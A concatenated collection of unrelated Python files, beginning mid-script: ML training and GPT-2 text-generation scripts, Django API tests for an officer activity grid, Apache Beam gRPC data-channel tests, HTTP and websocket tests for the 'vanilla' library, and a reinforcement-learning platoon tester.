loss_val_ /= n_batches
# Write summaries
vals = [summary_pb2.Summary.Value(tag='summary/accuracy_val',
simple_value=acc_val_),
summary_pb2.Summary.Value(tag='summary/loss_val',
simple_value=loss_val_)]
test_writer.add_summary(summary_pb2.Summary(value=vals), trial)
print('Step {:d} Trial {:d}'.format(global_step, trial))
print('Evaluation took: {:0.2f}s'.format(time.time() - t_start))
print('Accuracy training: {:0.4f}'.format(acc_train))
print('Accuracy validation: {:0.4f}'.format(acc_val_))
sys.stdout.flush()
# Report the test set precision as the measure
if tuner:
tuner.report_measure(acc_val_, trial)
return acc_val_
def run_training(hparams, train_dir, tuner):
"""Train.
Args:
hparams: A HParam object with the hyperparameters to use.
train_dir: Path of a directory where to log training events.
tuner: Optional hyperparameter Tuner object. TODO(iga): Remove
"""
if not FLAGS.train_dir:
raise ValueError('traning directory is not provided.')
if not FLAGS.data_dir:
raise ValueError('data directory is not provided.')
if not tf.gfile.Exists(train_dir):
tf.gfile.MakeDirs(train_dir)
print('Hyperparameters:')
for key, val in sorted(hparams.values().iteritems()):
print(key, val)
with tf.gfile.FastGFile(os.path.join(train_dir, 'hparams'), 'w') as f:
json.dump(hparams.to_json(), f)
tf.reset_default_graph()
######################### Tasks to train ###################################
data_train = clevr.data_from_tfrecord(
FLAGS.data_dir, 'train', FLAGS.batch_size, hparams)
data_val = clevr.data_from_tfrecord(
FLAGS.data_dir, 'val', FLAGS.batch_size, hparams)
######################### Build the network ################################
tf.train.get_or_create_global_step()
model_train = network.Model(hparams, constants.config)
model_train.build(data_train, FLAGS.batch_size, is_training=True)
merged = tf.summary.merge_all()
test_writer = tf.summary.FileWriter(train_dir + '/tb', flush_secs=120)
# Report parameter statistics
if FLAGS.report_param_stat:
param_stats = tf.contrib.tfprof.model_analyzer.print_model_analysis(
tf.get_default_graph(),
tfprof_options=tf.contrib.tfprof.model_analyzer.
TRAINABLE_VARS_PARAMS_STAT_OPTIONS)
print('total_params: {:d}'.format(param_stats.total_parameters))
PARAM_LIMIT = 2905217
if param_stats.total_parameters > 1.1 * PARAM_LIMIT:
raise tf.errors.ResourceExhaustedError(None, None,
"Hyperparams resulted in too many params: %d" %
param_stats.total_parameters)
model_val = network.Model(hparams, constants.config)
# TODO(gryang): Setting is_training=False doesn't seem to work correctly
model_val.build(data_val, FLAGS.batch_size, is_training=True)
saver = tf.train.Saver()
########################## Train the network ###############################
print("Train dir: " + train_dir)
checkpoint_path = train_dir + '/checkpoints'
acc_train_ = 0
best_acc_val_ = 0
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
cpkt_path = tf.train.latest_checkpoint(checkpoint_path)
if cpkt_path is not None:
print("Restoring model from: " + cpkt_path)
saver.restore(sess, cpkt_path)
print("Done restoring model")
else:
print("Did not find checkpoint at: " + checkpoint_path)
global_step = sess.run(tf.train.get_global_step())
print("Initial global step value: " + str(global_step))
print("Running until global step is: " + str(FLAGS.num_steps))
sys.stdout.flush()
trial = global_step * FLAGS.batch_size
while global_step <= FLAGS.num_steps:
trial = global_step * FLAGS.batch_size
try:
# Evaluation
if global_step > 0 and global_step % FLAGS.display_step == 0:
acc_val_ = evaluate(sess, model_val, n_batches=300,
test_writer=test_writer,
global_step=global_step,
trial=trial, tuner=tuner,
acc_train=acc_train_)
if acc_val_ > best_acc_val_:
best_acc_val_ = acc_val_
save_path = saver.save(sess, train_dir + '/checkpoints/model.ckpt')
print('Model saved in file {:s}'.format(save_path))
if global_step > 0 and global_step % FLAGS.summary_step == 0:
global_step, summary, _, acc_train_ = sess.run(
[tf.train.get_global_step(),
merged,
model_train.train_step,
model_train.acc])
test_writer.add_summary(summary, trial)
else:
# Training
global_step, _, acc_train_ = sess.run(
[tf.train.get_global_step(),
model_train.train_step,
model_train.acc])
except KeyboardInterrupt:
print('Training interrupted by user.')
break
print("Stopping at global step value: " + str(global_step))
# Test the final accuracy and record it as the last summary point
# 15k is the number of images in validation set
n_batches = 15000 // (FLAGS.batch_size // constants.QUESTIONS_PER_IMAGE)
print("Running final validation step over %d batches" % n_batches)
final_trial = trial + FLAGS.display_step * FLAGS.batch_size
print("Logging this eval under trial ", final_trial)
evaluate(sess, model_val, n_batches=n_batches, test_writer=test_writer,
global_step=global_step,
trial=final_trial,
tuner=tuner,
acc_train=acc_train_)
test_writer.close()
# Run the best network on the test set
run_test(train_dir, train_dir, hparams)
def main(_):
hparams_dict = get_default_hparams_dict()
hparams = tf.contrib.training.HParams(**hparams_dict)
hparams = hparams.parse(FLAGS.hparams) # Overwritten by FLAGS.hparams
if FLAGS.clevr_test_output:
run_test(FLAGS.train_dir, FLAGS.clevr_test_output, hparams)
else:
run_training(hparams, FLAGS.train_dir, None)
if __name__ == '__main__':
tf.app.run(main)
|
<filename>scripts/generate.py
#!/usr/bin/env python3
import os
import re
import json
from datetime import datetime
from collections import defaultdict
import click
import numpy as np
import tensorflow as tf
from src import model, sample, encoder
SENTENCE_PATTERN = re.compile(r'[^.!?]+(?:[.!?]|$)')
def split_sentences(text):
sents = []
for sent in SENTENCE_PATTERN.findall(text):
sent = sent.strip()
if not sent:
continue
if sents and re.match(r'[0-9][\.,]', sents[-1][-2:]) and re.match(r'[0-9]', sent[0]):
sents[-1] += sent
continue
if sents and sents[-1].endswith(' Mr.'):
sents[-1] = sents[-1] + ' ' + sent
continue
sents.append(sent)
return sents
def postprocess(hint, text):
text = text.strip()
if not text:
return hint
first_line = text.split('\n')[0]
sentences = split_sentences(first_line)
if not sentences:
return hint
return hint + ' ' + sentences[0]
def generate(hints, model_name='345M', seed=None,
nsamples=10, batch_size=1, length=None,
temperature=1, top_k=0, top_p=1, models_dir='models'):
models_dir = os.path.expanduser(os.path.expandvars(models_dir))
batch_size = batch_size or 1
assert nsamples % batch_size == 0
enc = encoder.get_encoder(model_name, models_dir)
hparams = model.default_hparams()
with open(os.path.join(models_dir, model_name, 'hparams.json')) as f:
hparams.override_from_dict(json.load(f))
if length is None:
length = hparams.n_ctx // 2
elif length > hparams.n_ctx:
raise ValueError("Can't get samples longer than window size: %s" % hparams.n_ctx)
results = defaultdict(set)
with tf.Session(graph=tf.Graph()) as sess:
context = tf.placeholder(tf.int32, [batch_size, None])
np.random.seed(seed)
tf.set_random_seed(seed)
output = sample.sample_sequence(
hparams=hparams, length=length,
context=context,
batch_size=batch_size,
temperature=temperature, top_k=top_k, top_p=top_p
)
saver = tf.train.Saver()
ckpt = tf.train.latest_checkpoint(os.path.join(models_dir, model_name))
saver.restore(sess, ckpt)
for hint in hints:
print("[%s]begin to generate for: %s" % (datetime.utcnow(), hint))
context_tokens = enc.encode(hint)
for _ in range(nsamples // batch_size):
out = sess.run(output, feed_dict={
context: [context_tokens for _ in range(batch_size)]
})[:, len(context_tokens):]
for out_data in out:
text = enc.decode(out_data)
text = postprocess(hint, text.strip())
results[hint].add(text)
print("[%s]finished generating for: %s" % (datetime.utcnow(), hint))
return results
@click.command()
@click.option("-i", "--infile", required=True)
@click.option("-o", "--outfile", required=True)
@click.option("-m", "--model-name", required=True)
@click.option("-d", "--model-dir", required=True)
@click.option("-n", "--nsamples", type=int, default=10)
@click.option("-t", "--temperature", type=float, default=0.7)
def main(infile, outfile, model_name, model_dir, nsamples, temperature):
hints = [line.strip() for line in open(infile) if line.strip()]
results = generate(hints, model_name=model_name, models_dir=model_dir,
nsamples=nsamples, temperature=temperature)
with open(outfile, 'w') as fout:
for hint in hints:
for new_text in sorted(results[hint]):
print(f"{hint}\t{new_text}", file=fout)
if __name__ == '__main__':
main()
|
<gh_stars>10-100
from datetime import datetime, date
import pytz
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from robber import expect
from activity_grid.factories import ActivityCardFactory, ActivityPairCardFactory
from activity_grid.models import ActivityPairCard
from data.cache_managers import cache_all
from data.factories import OfficerFactory, OfficerAllegationFactory, AllegationFactory
from data.models import Officer
class ActivityGridViewSetTestCase(APITestCase):
def test_list_return_exactly_80_items(self):
ActivityCardFactory.create_batch(50)
ActivityPairCardFactory.create_batch(50)
response = self.client.get(reverse('api-v2:activity-grid-list'))
expect(response.status_code).to.eq(status.HTTP_200_OK)
expect(response.data).to.have.length(80)
def test_list_item_content(self):
officer1 = OfficerFactory(
first_name='Jerome',
last_name='Finnigan',
birth_year=1950,
race='Asian',
gender='M',
appointed_date=datetime(2011, 1, 1, tzinfo=pytz.utc),
complaint_percentile=50.0,
allegation_count=6,
sustained_count=2,
rank='Police Officer',
)
officer2 = OfficerFactory(
first_name='Raymond',
last_name='Piwinicki',
birth_year=1960,
race='White',
gender='M',
appointed_date=datetime(2012, 1, 1, tzinfo=pytz.utc),
complaint_percentile=0.0,
allegation_count=1,
sustained_count=1,
rank='Police Officer',
)
allegation = AllegationFactory(incident_date=datetime(2014, 1, 1, tzinfo=pytz.utc))
OfficerAllegationFactory(
officer=officer1,
allegation=allegation,
final_finding='SU',
start_date=date(2014, 1, 1),
)
OfficerAllegationFactory(
officer=officer2,
allegation=allegation,
final_finding='SU',
start_date=date(2014, 1, 1),
)
OfficerAllegationFactory(
officer=officer1,
final_finding='SU',
allegation__incident_date=datetime(2016, 1, 1, tzinfo=pytz.utc),
start_date=date(2016, 1, 1)
)
OfficerAllegationFactory.create_batch(
4,
officer=officer1,
final_finding='NS',
start_date=date(2015, 1, 1),
allegation__incident_date=datetime(2015, 2, 20, tzinfo=pytz.utc)
)
ActivityCardFactory(officer=officer1, last_activity=datetime(2018, 12, 22, tzinfo=pytz.utc))
ActivityCardFactory(officer=officer2, last_activity=datetime(2018, 10, 15, tzinfo=pytz.utc))
ActivityPairCardFactory(
officer1=officer1, officer2=officer2, last_activity=datetime(2018, 5, 20, tzinfo=pytz.utc)
)
cache_all()
url = reverse('api-v2:activity-grid-list')
response = self.client.get(url)
expect(response.status_code).to.eq(status.HTTP_200_OK)
expect(response.data).to.eq([{
'id': officer1.id,
'full_name': '<NAME>',
'complaint_count': 6,
'sustained_count': 2,
'birth_year': 1950,
'race': 'Asian',
'gender': 'Male',
'rank': 'Police Officer',
'percentile_trr': '0.0000',
'percentile_allegation_internal': '0.0000',
'percentile_allegation_civilian': '50.0000',
'percentile_allegation': '50.0000',
'kind': 'single_officer',
}, {
'id': officer2.id,
'full_name': '<NAME>',
'complaint_count': 1,
'sustained_count': 1,
'birth_year': 1960,
'race': 'White',
'gender': 'Male',
'rank': 'Police Officer',
'percentile_trr': '0.0000',
'percentile_allegation_internal': '0.0000',
'percentile_allegation_civilian': '0.0000',
'percentile_allegation': '0.0000',
'kind': 'single_officer',
}, {
'officer1': {
'id': officer1.id,
'full_name': '<NAME>',
'birth_year': 1950,
'race': 'Asian',
'gender': 'Male',
'rank': 'Police Officer',
'percentile_trr': '0.0000',
'percentile_allegation_internal': '0.0000',
'percentile_allegation_civilian': '50.0000',
'percentile_allegation': '50.0000',
'complaint_count': 6,
'sustained_count': 2,
},
'officer2': {
'id': officer2.id,
'full_name': '<NAME>',
'birth_year': 1960,
'race': 'White',
'gender': 'Male',
'rank': 'Police Officer',
'percentile_trr': '0.0000',
'percentile_allegation_internal': '0.0000',
'percentile_allegation_civilian': '0.0000',
'percentile_allegation': '0.0000',
'complaint_count': 1,
'sustained_count': 1,
},
'coaccusal_count': 1,
'kind': 'coaccused_pair',
}])
def test_list_order(self):
ActivityCardFactory.create_batch(3, important=True)
ActivityCardFactory.create_batch(10, last_activity=datetime(2017, 5, 21, tzinfo=pytz.utc))
ActivityCardFactory.create_batch(10)
ActivityCardFactory.create_batch(17, last_activity=datetime(2017, 7, 21, tzinfo=pytz.utc))
ActivityPairCardFactory.create_batch(3, important=True)
ActivityPairCardFactory.create_batch(10, last_activity=datetime(2017, 5, 20, tzinfo=pytz.utc))
ActivityPairCardFactory.create_batch(10)
ActivityPairCardFactory.create_batch(17, last_activity=datetime(2017, 7, 20, tzinfo=pytz.utc))
url = reverse('api-v2:activity-grid-list')
cache_all()
response = self.client.get(url)
expect(response.status_code).to.eq(status.HTTP_200_OK)
expect(response.data).to.have.length(80)
for item in response.data[:3]:
activity_card = Officer.objects.get(pk=item['id']).activity_card
expect(activity_card.important).to.be.true()
for item in response.data[3:6]:
pair_card = ActivityPairCard.objects.get(
officer1_id=item['officer1']['id'], officer2_id=item['officer2']['id']
)
expect(pair_card.important).to.be.true()
for item in response.data[6:23]:
activity_card = Officer.objects.get(pk=item['id']).activity_card
expect(activity_card.last_activity).to.eq(datetime(2017, 7, 21, tzinfo=pytz.utc))
for item in response.data[23:40]:
pair_card = ActivityPairCard.objects.get(
officer1_id=item['officer1']['id'], officer2_id=item['officer2']['id']
)
expect(pair_card.last_activity).to.eq(datetime(2017, 7, 20, tzinfo=pytz.utc))
for item in response.data[40:50]:
activity_card = Officer.objects.get(pk=item['id']).activity_card
expect(activity_card.last_activity).to.eq(datetime(2017, 5, 21, tzinfo=pytz.utc))
for item in response.data[50:60]:
pair_card = ActivityPairCard.objects.get(
officer1_id=item['officer1']['id'], officer2_id=item['officer2']['id']
)
expect(pair_card.last_activity).to.eq(datetime(2017, 5, 20, tzinfo=pytz.utc))
|
import tensorflow as tf
import numpy as np
import time
from models import (Autoencoder,
Discriminator_x)
from models_mvtec import Autoencoder as Autoencoder_MVTEC
from models_mvtec import Discriminator_x as Discriminator_x_MVTEC
from utils.plotting import (generate_and_save_images,
generate_and_save_training,
save_training_curves)
from utils.training import print_epoch,save_checkpoint
from model_config import *
from .helper import end_routine
ae_optimizer = tf.keras.optimizers.Adam()
discriminator_optimizer = tf.keras.optimizers.Adam(1e-5)
generator_optimizer = tf.keras.optimizers.Adam(1e-5)
def ae_loss(x,x_hat):
return cross_entropy(x,x_hat)
def discriminator_loss(real_output, fake_output,loss_weight):
real_loss = cross_entropy(tf.ones_like(real_output), real_output)
fake_loss = cross_entropy(tf.zeros_like(fake_output), fake_output)
total_loss = real_loss + fake_loss
return loss_weight * total_loss
def generator_loss(fake_output, loss_weight):
return loss_weight * tf.reduce_mean(cross_entropy(tf.ones_like(fake_output), fake_output))
@tf.function
def train_step(ae,discriminator, x):
"""Executes one training step and returns the loss.
This function computes the loss and gradients, and uses the latter to
update the model's parameters.
"""
with tf.GradientTape() as ae_tape,\
tf.GradientTape() as disc_tape,\
tf.GradientTape() as gen_tape:
x_hat = ae(x)
real_output,c0 = discriminator(x, training=True)
fake_output,c1 = discriminator(x_hat, training=True)
auto_loss = ae_loss(x,x_hat)
disc_loss = discriminator_loss(real_output, fake_output,1)
gen_loss = generator_loss(fake_output,1)
gradients_of_ae = ae_tape.gradient(auto_loss, ae.trainable_variables)
gradients_of_discriminator = disc_tape.gradient(disc_loss,
discriminator.trainable_variables)
gradients_of_generator = gen_tape.gradient(gen_loss,
ae.decoder.trainable_variables)
ae_optimizer.apply_gradients(zip(gradients_of_ae, ae.trainable_variables))
discriminator_optimizer.apply_gradients(zip(gradients_of_discriminator,
discriminator.trainable_variables))
generator_optimizer.apply_gradients(zip(gradients_of_generator,
ae.decoder.trainable_variables))
return auto_loss,disc_loss,gen_loss
def train(ae,discriminator, train_dataset,test_images,test_labels,args):
ae_loss,d_loss, g_loss= [], [], []
for epoch in range(args.epochs):
start = time.time()
for image_batch in train_dataset:
auto_loss,disc_loss,gen_loss = train_step(ae,
discriminator,
image_batch)
generate_and_save_images(ae,
epoch + 1,
image_batch[:25,...],
'DAE_disc',
args)
save_checkpoint(ae,epoch,args,'DAE_disc','ae')
save_checkpoint(discriminator, epoch, args,'DAE_disc','disc')
ae_loss.append(auto_loss)
d_loss.append(disc_loss)
g_loss.append(gen_loss)
print_epoch('DAE_disc',
epoch,
time.time()-start,
{'AE Loss':auto_loss.numpy(),
'Discrimator Loss':disc_loss.numpy(),
'Generator Loss':gen_loss.numpy()},
None)
generate_and_save_training([ae_loss,d_loss,g_loss],
['ae loss','disc loss','gen loss'],
'DAE_disc',args)
generate_and_save_images(ae,epoch,image_batch[:25,...],'DAE_disc',args)
return ae,discriminator
def main(train_dataset,train_images, train_labels, test_images, test_labels, test_masks, args):
if args.data == 'MVTEC':
ae = Autoencoder_MVTEC(args)
discriminator = Discriminator_x_MVTEC(args)
else:
ae = Autoencoder(args)
discriminator = Discriminator_x(args)
ae, discriminator = train(ae,
discriminator,
train_dataset,
test_images,
test_labels,
args)
end_routine(train_images, test_images, test_labels, test_masks, [ae, discriminator], 'DAE_disc', args)
if __name__ == '__main__':
main()
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests for apache_beam.runners.worker.data_plane."""
# pytype: skip-file
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import logging
import time
import unittest
import grpc
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
from apache_beam.utils import thread_pool_executor
class DataChannelTest(unittest.TestCase):
def test_grpc_data_channel(self):
self._grpc_data_channel_test()
def test_time_based_flush_grpc_data_channel(self):
self._grpc_data_channel_test(True)
def _grpc_data_channel_test(self, time_based_flush=False):
if time_based_flush:
data_servicer = data_plane.BeamFnDataServicer(
data_buffer_time_limit_ms=100)
else:
data_servicer = data_plane.BeamFnDataServicer()
worker_id = 'worker_0'
data_channel_service = \
data_servicer.get_conn_by_worker_id(worker_id)
server = grpc.server(thread_pool_executor.shared_unbounded_instance())
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(data_servicer, server)
test_port = server.add_insecure_port('[::]:0')
server.start()
grpc_channel = grpc.insecure_channel('localhost:%s' % test_port)
# Add workerId to the grpc channel
grpc_channel = grpc.intercept_channel(
grpc_channel, WorkerIdInterceptor(worker_id))
data_channel_stub = beam_fn_api_pb2_grpc.BeamFnDataStub(grpc_channel)
if time_based_flush:
data_channel_client = data_plane.GrpcClientDataChannel(
data_channel_stub, data_buffer_time_limit_ms=100)
else:
data_channel_client = data_plane.GrpcClientDataChannel(data_channel_stub)
try:
self._data_channel_test(
data_channel_service, data_channel_client, time_based_flush)
finally:
data_channel_client.close()
data_channel_service.close()
data_channel_client.wait()
data_channel_service.wait()
def test_in_memory_data_channel(self):
channel = data_plane.InMemoryDataChannel()
self._data_channel_test(channel, channel.inverse())
def _data_channel_test(self, server, client, time_based_flush=False):
self._data_channel_test_one_direction(server, client, time_based_flush)
self._data_channel_test_one_direction(client, server, time_based_flush)
def _data_channel_test_one_direction(
self, from_channel, to_channel, time_based_flush):
transform_1 = '1'
transform_2 = '2'
# Single write.
stream01 = from_channel.output_stream('0', transform_1)
stream01.write(b'abc')
if not time_based_flush:
stream01.close()
self.assertEqual(
list(
itertools.islice(to_channel.input_elements('0', [transform_1]), 1)),
[
beam_fn_api_pb2.Elements.Data(
instruction_id='0', transform_id=transform_1, data=b'abc')
])
# Multiple interleaved writes to multiple instructions.
stream11 = from_channel.output_stream('1', transform_1)
stream11.write(b'abc')
stream21 = from_channel.output_stream('2', transform_1)
stream21.write(b'def')
if not time_based_flush:
stream11.close()
self.assertEqual(
list(
itertools.islice(to_channel.input_elements('1', [transform_1]), 1)),
[
beam_fn_api_pb2.Elements.Data(
instruction_id='1', transform_id=transform_1, data=b'abc')
])
if time_based_flush:
# Wait to ensure stream21 is flushed before stream22.
# Because the flush callback is invoked periodically starting from when a
# stream is constructed, there is no guarantee that one stream's callback
# is called before the other.
time.sleep(0.1)
else:
stream21.close()
stream22 = from_channel.output_stream('2', transform_2)
stream22.write(b'ghi')
if not time_based_flush:
stream22.close()
self.assertEqual(
list(
itertools.islice(
to_channel.input_elements('2', [transform_1, transform_2]), 2)),
[
beam_fn_api_pb2.Elements.Data(
instruction_id='2', transform_id=transform_1, data=b'def'),
beam_fn_api_pb2.Elements.Data(
instruction_id='2', transform_id=transform_2, data=b'ghi')
])
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
unittest.main()
|
<reponame>adamchainz/vanilla
import json
import gc
import pytest
import vanilla
import vanilla.http
# TODO: remove
import logging
logging.basicConfig()
class TestHTTP(object):
def test_get_body(self):
h = vanilla.Hub()
serve = h.http.listen()
@h.spawn
def _():
conn = serve.recv()
for request in conn:
request.reply(vanilla.http.Status(200), {}, request.path)
uri = 'http://localhost:%s' % serve.port
conn = h.http.connect(uri)
response = conn.get('/')
response = response.recv()
assert response.status.code == 200
assert response.consume() == '/'
assert response.headers['Date']
response = conn.get('/toby').recv()
assert response.status.code == 200
assert response.consume() == '/toby'
h.stop()
assert not h.registered
def test_get_chunked(self):
h = vanilla.Hub()
serve = h.http.listen()
@h.spawn
def _():
conn = serve.recv()
for request in conn:
sender, recver = h.pipe()
request.reply(vanilla.http.Status(200), {}, recver)
for i in xrange(3):
h.sleep(10)
sender.send(str(i))
if len(request.path) > 1:
sender.send(request.path[1:])
sender.close()
uri = 'http://localhost:%s' % serve.port
conn = h.http.connect(uri)
response = conn.get('/').recv()
assert response.status.code == 200
assert list(response.body) == ['0', '1', '2']
response = conn.get('/peace').recv()
assert response.status.code == 200
assert list(response.body) == ['0', '1', '2', 'peace']
h.stop()
assert not h.registered
def test_post(self):
h = vanilla.Hub()
serve = h.http.listen()
@h.spawn
def _():
conn = serve.recv()
for request in conn:
request.reply(vanilla.http.Status(200), {}, request.consume())
uri = 'http://localhost:%s' % serve.port
conn = h.http.connect(uri)
response = conn.post('/').recv()
assert response.status.code == 200
assert response.consume() == ''
response = conn.post('/', data='toby').recv()
assert response.status.code == 200
assert response.consume() == 'toby'
h.stop()
@pytest.mark.skipif(True, reason='TODO')
def test_post_chunked(self):
print
print
h = vanilla.Hub()
serve = h.http.listen()
@h.spawn
def _():
conn = serve.recv()
for request in conn:
sender, recver = h.pipe()
request.reply(vanilla.http.Status(200), {}, recver)
for data in request.body:
sender.send(data)
sender.close()
uri = 'http://localhost:%s' % serve.port
conn = h.http.connect(uri)
sender, recver = h.pipe()
@h.spawn
def _():
for i in xrange(3):
sender.send(str(i))
h.sleep(10)
sender.close()
response = conn.post('/', data=recver).recv()
for data in response.body:
print data
# h.stop()
def test_post_form_encoded(self):
h = vanilla.Hub()
serve = h.http.listen()
uri = 'http://localhost:%s' % serve.port
client = h.http.connect(uri)
response = client.post('/', data={'k1': 'v1', 'k2': 'v2'})
conn = serve.recv()
request = conn.recv()
assert request.form == {'k1': 'v1', 'k2': 'v2'}
assert request.form_multi == {'k1': ['v1'], 'k2': ['v2']}
request.reply(vanilla.http.Status(200), {}, '')
response = response.recv()
assert response.status.code == 200
h.stop()
def test_put(self):
h = vanilla.Hub()
serve = h.http.listen()
@h.spawn
def _():
conn = serve.recv()
for request in conn:
request.reply(
vanilla.http.Status(200),
{},
request.method+request.consume())
uri = 'http://localhost:%s' % serve.port
conn = h.http.connect(uri)
response = conn.put('/').recv()
assert response.status.code == 200
assert response.consume() == 'PUT'
response = conn.put('/', data='toby').recv()
assert response.status.code == 200
assert response.consume() == 'PUTtoby'
h.stop()
def test_delete(self):
h = vanilla.Hub()
serve = h.http.listen()
@h.spawn
def _():
conn = serve.recv()
for request in conn:
request.reply(vanilla.http.Status(200), {}, request.method)
uri = 'http://localhost:%s' % serve.port
conn = h.http.connect(uri)
response = conn.delete('/').recv()
assert response.status.code == 200
assert response.consume() == 'DELETE'
h.stop()
def test_404(self):
h = vanilla.Hub()
serve = h.http.listen()
@h.spawn
def _():
conn = serve.recv()
for request in conn:
request.reply(vanilla.http.Status(404), {}, '')
uri = 'http://localhost:%s' % serve.port
response = h.http.connect(uri).get('/').recv()
assert response.status.code == 404
h.stop()
def test_overlap(self):
h = vanilla.Hub()
serve = h.http.listen()
@h.spawn
def _():
conn = serve.recv()
for request in conn:
t = request.path[1:]
h.sleep(int(t))
request.reply(vanilla.http.Status(200), {}, t)
uri = 'http://localhost:%s' % serve.port
conn = h.http.connect(uri)
q = h.queue(10)
def go(t):
r = conn.get('/'+str(t)).recv()
q.send(int(r.consume()))
h.spawn(go, 50)
h.spawn(go, 20)
assert q.recv() == 50
assert q.recv() == 20
h.stop()
def test_basic_auth(self):
h = vanilla.Hub()
serve = h.http.listen()
@h.spawn
def _():
conn = serve.recv()
for request in conn:
request.reply(
vanilla.http.Status(200),
{},
request.headers['Authorization'])
uri = 'http://localhost:%s' % serve.port
conn = h.http.connect(uri)
response = conn.get('/', auth=('foo', 'bar'))
response = response.recv()
assert response.consume() == 'Basic Zm9vOmJhcg=='
def test_connection_lost(self):
h = vanilla.Hub()
serve = h.http.listen()
@h.spawn
def _():
conn = serve.recv()
for request in conn:
conn.socket.close()
uri = 'http://localhost:%s' % serve.port
conn = h.http.connect(uri)
response = conn.get('/')
pytest.raises(vanilla.ConnectionLost, response.recv)
h.stop()
def test_json(self):
h = vanilla.Hub()
serve = h.http.listen()
uri = 'http://localhost:%s' % serve.port
response = h.http.get(uri)
conn = serve.recv()
request = conn.recv()
request.reply(vanilla.http.Status(200), {}, json.dumps({'foo': 'bar'}))
response = response.recv()
assert response.json() == {'foo': 'bar'}
class TestWebsocket(object):
def test_websocket(self):
h = vanilla.Hub()
serve = h.http.listen()
@h.spawn
def _():
conn = serve.recv()
request = conn.recv()
ws = request.upgrade()
for item in ws.recver:
ws.send(item)
uri = 'ws://localhost:%s' % serve.port
ws = h.http.connect(uri).websocket('/')
gc.collect()
message = 'x' * 125
ws.send(message)
assert ws.recv() == message
message = 'x' * 126
ws.send(message)
assert ws.recv() == message
message = 'x' * 65535
ws.send(message)
assert ws.recv() == message
message = 'x' * 65536
ws.send(message)
assert ws.recv() == message
# test we can call select on the websocket
message = 'x' * 125
ws.send(message)
assert h.select([ws.recver]) == (ws.recver, message)
h.stop()
def test_websocket_end(self):
h = vanilla.Hub()
serve = h.http.listen()
@h.spawn
def _():
conn = serve.recv()
request = conn.recv()
ws = request.upgrade()
ws.recv()
ws.close()
uri = 'ws://localhost:%s' % serve.port
ws = h.http.connect(uri).websocket('/')
ws.send('1')
pytest.raises(vanilla.Closed, ws.recv)
h.stop()
|
<filename>examples/Tester_platoon.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 4 19:01:24 2020
@author: <NAME>
"""
# tester platoon
from asynch_rl.rl.rl_env import Multiprocess_RL_Environment
from asynch_rl.rl.utilities import clear_pycache, load_train_params
import sys
import psutil
import time
import matplotlib.pyplot as plt
import numpy as np
import os
import asyncio
#####
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument("-v", "--version", dest="net_version", type = int, default= 31 , help="training version")
parser.add_argument("-i", "--iter" , dest="iteration" , type = int, default= -1 , help="iteration")
parser.add_argument("-sim", "--simulate" , dest="simulate" , type=lambda x: (str(x).lower() in ['true','1', 'yes']), default= True , help="simulate instance")
parser.add_argument("-d", "--difficulty" , dest="difficulty" , type = int, default= 1 , help="difficulty")
parser.add_argument("-s", "--save-movie" , dest="save_movie" , type=lambda x: (str(x).lower() in ['true','1', 'yes']), default= False , help="save movie")
parser.add_argument("-e", "--eps-format" , dest="eps_format" , type=lambda x: (str(x).lower() in ['true','1', 'yes']), default= False , help="eps_format")
args = parser.parse_args()
################
# generate proper discretized bins structure
def main(net_version = 100, iteration = 2, simulate = False, difficulty = 0, save_movie = False, eps_format = False):
# generate proper discretized bins structure
################
env_type = 'Platoon'
model_type = 'LinearModel'
overwrite_params = ['layers_width','discr_act_bins', 'n_gears', 'rewards', 'rl_mode', 'normalize_layers', 'val_frequency']
my_dict = load_train_params(env_type, model_type, overwrite_params, net_version)
local_vars = locals()
for i,par in enumerate(overwrite_params):
#exec(par + " = my_dict['" + par + "']", None, )
local_vars[par] = my_dict[par]
del( overwrite_params, my_dict)
import inspect
inspect.signature(Multiprocess_RL_Environment.__init__)
env_options = {'n_gears' : local_vars['n_gears']}
#discr_act_bins = local_vars['discr_act_bins']
#if change_gears:
# discr_act_bins.append(1)
rl_env = Multiprocess_RL_Environment(env_type, model_type, net_version, rl_mode=local_vars['rl_mode'] , ray_parallelize=False, \
move_to_cuda=False, show_rendering = True, discr_env_bins=local_vars['discr_act_bins'],\
difficulty= difficulty, layers_width = local_vars['layers_width'], normalize_layers = local_vars['normalize_layers'] ,\
rewards=local_vars['rewards'], val_frequency=local_vars['val_frequency'], env_options = env_options) #, \
rl_env.save_movie = False
rl_env.live_plot = False
# always update agents params after rl_env params are changed
rl_env.updateAgentsAttributesExcept('env')
rl_env.load(iteration)
#rl_env.load(320)
rl_env.plot_training_log(1)
#%%
agent = rl_env.sim_agents_discr[0]
#agent.max_steps_single_run = 5000
#
agent.movie_frequency = 1
agent.tot_iterations = 500
agent.max_n_single_runs = 1
agent.env.env.sim_length_max = 200
sim_log, single_runs , successful_runs,_,_, pg_info = agent.run_synch(use_NN = True, test_qv = False)
agent.env.env.plot_graphs()
#%%
################################################################
if __name__ == "__main__":
main(net_version = args.net_version, iteration = args.iteration, simulate = args.simulate, \
difficulty = args.difficulty, save_movie=args.save_movie, eps_format=args.eps_format)
current_folder = os.path.abspath(os.path.dirname(__file__))
clear_pycache(current_folder)
|
import pickle
from inspect import getsourcelines, getfile
import numpy as np
import statsmodels.api as sm
from matplotlib import pyplot as plt
from modelinter.models.constants import Paths
def returns(a_0, a_1):
"""linear returns formula"""
return (a_1 - a_0) / a_0
def inverse_returns(C, r):
"invert the returns formula"
return C * (1 + r)
